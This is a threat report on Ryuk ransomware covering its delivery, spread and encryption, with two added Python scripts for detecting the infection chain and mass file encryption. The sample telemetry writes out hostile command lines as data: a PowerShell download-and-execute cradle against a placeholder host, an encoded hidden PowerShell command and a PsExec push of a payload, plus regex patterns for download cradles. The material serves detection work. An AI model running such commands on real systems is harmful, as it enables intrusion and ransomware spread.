This report is an overview of the Ryuk ransomware and contains actionable intelligence for understanding and protecting against the malware threat.
Discovered in 2018, this ransomware continues to attract publicity because of its impact on large organizations. Malware researchers have noted increased activity by the ransomware in recent months. Most recently, Ryuk successfully attacked Universal Health Services, one of the largest healthcare providers in the United States.
Ryuk has been attributed to a few threat actors, with its origins traced to North Korea or Russia. The Russia-based Wizard Spider threat actor appears to be behind the ransomware attacks and is also credited with activity involving the TrickBot malware.
Malware researchers believe Ryuk is a derivative of the older Hermes ransomware, as much of the same code is used by Ryuk. However, Ryuk has continued to develop beyond Hermes since its discovery. At this time only Windows OS devices appear to be targeted.
Like much other malware, a Ryuk infection often begins with a phishing campaign. Phishing may be used to infect victims directly with the ransomware, or it may initially deliver Emotet or TrickBot. The threat actor may later decide to push the Ryuk ransomware executable payload to encrypt the system. PowerShell scripts are commonly used for the download, leveraging tools such as PowerShell Empire and PsExec. Avertium partner Sophos offers this graphic to depict an example chain of infection.
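The infection chain above (phishing lure, PowerShell download, PsExec lateral movement) leaves a recognisable footprint in process-creation telemetry. The following is an added detection example, not code from Avertium, Sophos or any vendor named in the report: it tags each event for one of the three stages and reports a host that hits two or more stages inside a time window. The event tuple shape and the sample events are constructed assumptions; map your own Sysmon Event ID 1 or Windows 4688 fields into the same five fields.

```python
"""Correlate process-creation events into a phishing -> PowerShell -> PsExec chain.

Added example (not the report's or a vendor's code). Events are constructed
tuples: (timestamp, host, parent_image, image, command_line).
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample telemetry; hostnames, user and URL are placeholders.
SAMPLE_EVENTS = [
    ("2020-10-01T09:12:03", "WS-014", "outlook.exe", "winword.exe",
     "WINWORD.EXE /n invoice.doc"),
    ("2020-10-01T09:12:40", "WS-014", "winword.exe", "powershell.exe",
     "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    ("2020-10-01T09:13:05", "WS-014", "powershell.exe", "powershell.exe",
     "powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"),
    ("2020-10-01T11:40:11", "WS-014", "cmd.exe", "PsExec.exe",
     "PsExec.exe \\\\FS-01 -u corp\\admin -d -c payload.exe"),
    ("2020-10-01T11:40:12", "FS-01", "services.exe", "PSEXESVC.exe", "PSEXESVC.exe"),
    # Benign admin use of PowerShell on another workstation: should not fire.
    ("2020-10-01T08:00:00", "WS-020", "explorer.exe", "powershell.exe",
     "powershell.exe Get-Process"),
]

OFFICE_APPS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
# Common download-cradle verbs seen in PowerShell one-liners.
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|bitsadmin", re.I)
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_CMD = re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\s", re.I)
LATERAL_TOOLS = {"psexec.exe", "psexec64.exe", "psexesvc.exe"}


def classify(event):
    """Return the chain stages a single event matches (possibly none)."""
    _ts, _host, parent, image, cmdline = event
    image_l, parent_l = image.lower(), parent.lower()
    tags = []
    if image_l == "powershell.exe" and parent_l in OFFICE_APPS:
        tags.append("office_spawns_powershell")
    if image_l == "powershell.exe" and (DOWNLOAD_CRADLE.search(cmdline)
                                        or ENCODED_CMD.search(cmdline)):
        tags.append("powershell_download_or_encoded")
    if image_l in LATERAL_TOOLS:
        tags.append("psexec_activity")
    return tags


def correlate(events, window_hours=6):
    """Group tagged events per host; a host that reaches two or more distinct
    stages within window_hours of its first tagged event is reported.
    The window length is an assumption; tune it to your environment."""
    by_host = defaultdict(list)
    for ev in events:
        tags = classify(ev)
        if tags:
            by_host[ev[1]].append((datetime.fromisoformat(ev[0]), tags))
    findings = {}
    for host, hits in by_host.items():
        hits.sort(key=lambda h: h[0])
        first = hits[0][0]
        stages = set()
        for ts, tags in hits:
            if ts - first <= timedelta(hours=window_hours):
                stages.update(tags)
        if len(stages) >= 2:
            findings[host] = sorted(stages)
    return findings


if __name__ == "__main__":
    for host, stages in correlate(SAMPLE_EVENTS).items():
        print(f"{host}: suspected chain, stages = {', '.join(stages)}")
```

A single stage (one PsExec service start on a file server, one encoded PowerShell command) is noisy on its own; requiring two stages on the same host is what makes the alert worth a responder's time. The lone PSEXESVC event on FS-01 is therefore not reported here, but it is exactly the host you would pivot to once WS-014 fires.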
Ryuk is distributed with a dropper for the actual executable payload. The dropper is not often recovered, as it is deleted from the system once the payload runs. The dropper randomly generates the payload file name upon installation.
Before encryption, the malware checks whether the system is running under VirtualBox or whether its language is Russian, Ukrainian, or Belarusian, and will not execute on such systems. Ryuk enumerates the network and all drives on the host in order to encrypt every mounted drive on the system and any hosts it can reach remotely. Ryuk uses RSA-2048 and AES-256 to encrypt the files. Once encryption is complete, a ransom note is placed on the system requesting Bitcoin payment for the decryption of the files.
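Because Ryuk encrypts every reachable drive and then drops a ransom note, the most reliable host-side signal is the bulk transformation of ordinary files into high-entropy content plus the appearance of a new text file asking for Bitcoin. The following added example (not code from the report or from CrowdStrike) implements that check over two file-system snapshots. The snapshots, thresholds, note keywords and paths are constructed assumptions; in practice the snapshots come from a file-integrity monitor or decoy (canary) directory, and the pseudo-random bytes stand in for AES ciphertext.

```python
"""Flag Ryuk-style mass encryption from before/after file snapshots.

Added example, not from the report. Snapshots are constructed in-memory
dicts (path -> bytes); feed real ones from a file-integrity monitor.
"""
import math
import random
import re
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0.0 for empty input, up to 8.0 for uniform random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


# Constructed keyword heuristic for a ransom note; real notes vary.
RANSOM_NOTE_HINT = re.compile(r"bitcoin|btc|decrypt", re.I)


def analyze_snapshots(before, after, high_entropy=7.0, min_ratio=0.5, min_size=256):
    """Compare two snapshots and report suspected encryption.

    A file counts as encrypted when it existed before with low-entropy
    content and now holds high-entropy content (files below min_size are
    skipped because entropy estimates on tiny inputs are unreliable).
    Thresholds are assumptions; tune them for your environment.
    """
    encrypted = []
    for path, old in before.items():
        new = after.get(path)
        if new is None or len(old) < min_size or len(new) < min_size:
            continue
        if shannon_entropy(old) < high_entropy <= shannon_entropy(new):
            encrypted.append(path)
    notes = [p for p in after
             if p not in before
             and RANSOM_NOTE_HINT.search(after[p].decode("utf-8", "ignore"))]
    ratio = len(encrypted) / len(before) if before else 0.0
    return {
        "encrypted_files": sorted(encrypted),
        "ransom_notes": sorted(notes),
        "ratio": ratio,
        # Verdict: either most of the tree flipped, or some files flipped and a note appeared.
        "verdict": bool(ratio >= min_ratio or (notes and encrypted)),
    }


# Constructed sample data. Seeded PRNG bytes stand in for ciphertext so the run is deterministic.
_rng = random.Random(1)


def _fake_ciphertext(n: int) -> bytes:
    return bytes(_rng.getrandbits(8) for _ in range(n))


BEFORE = {
    "D:/share/q3_report.docx": b"Quarterly report: revenue, costs, headcount. " * 60,
    "D:/share/budget.xlsx": b"dept,amount\nsales,120000\nops,90000\n" * 80,
    "D:/share/logo.png": _fake_ciphertext(2048),  # already compressed, high entropy
}
AFTER = {
    "D:/share/q3_report.docx": _fake_ciphertext(4096),
    "D:/share/budget.xlsx": _fake_ciphertext(4096),
    "D:/share/logo.png": _fake_ciphertext(2048),
    "D:/share/README.txt": b"Your files are encrypted. Send Bitcoin to the address below to decrypt them.",
}

if __name__ == "__main__":
    result = analyze_snapshots(BEFORE, AFTER)
    print("suspected encryption:", result["verdict"])
    print("files flipped to high entropy:", result["encrypted_files"])
    print("possible ransom notes:", result["ransom_notes"])
```

Note that logo.png is not reported even though its contents changed: compressed images are already near 8 bits per byte, so entropy alone cannot distinguish them from ciphertext. That is why the check keys on the transition from low to high entropy rather than on the final value, and why the ransom-note signal is combined with it rather than used alone.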
The below example is provided by CrowdStrike:
Note: The Avertium Threat Report analyzes one current threat that has been shared by threat intelligence networks across the globe. Used internally by the Avertium CyberOps Team, this report outlines a “top-of-mind” threat and how it ought to be addressed.
This informed analysis is based on the latest data available.